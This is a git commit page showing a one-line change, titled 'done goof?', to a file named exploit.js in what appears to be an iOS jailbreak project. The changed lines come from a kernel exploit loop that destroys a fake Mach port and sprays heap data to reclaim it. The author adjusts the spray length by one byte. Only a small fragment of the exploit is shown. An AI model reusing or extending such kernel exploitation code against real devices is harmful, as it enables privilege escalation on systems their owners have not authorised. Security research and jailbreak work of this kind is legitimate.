diff options
| author | spv420 <spv@spv.sh> | 2022-07-31 19:16:20 -0400 |
|---|---|---|
| committer | spv420 <spv@spv.sh> | 2022-07-31 19:16:20 -0400 |
| commit | bcb7205213ce8a270a701b472a7636e8a107b99d (patch) | |
| tree | 92332be7a67a77d7768a145780de428ce38f8680 | |
| parent | b41b998cf8345e05496b81be15bad51b6afe13e1 (diff) | |
done goof?
| -rwxr-xr-x | src/stage4/kexp/exploit.js | 2 |
1 files changed, 1 insertions, 1 deletions
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js index 19d2623..e96dea4 100755 --- a/src/stage4/kexp/exploit.js +++ b/src/stage4/kexp/exploit.js @@ -537,7 +537,7 @@ again: while (true) { usleep(10000); sched_yield(); mach_port_destroy(mach_task_self(), read_u32(fakeportData)); - ret__ = spray_data(tst, tst_str.length, 10, fakeportData); + ret__ = spray_data(tst, tst_str.length + 1, 10, fakeportData); p0laris_log("sd %d (%s)\n", ret__, mach_error_string(ret__)); p0laris_log("fuck\n"); p0laris_log("done realloc"); |
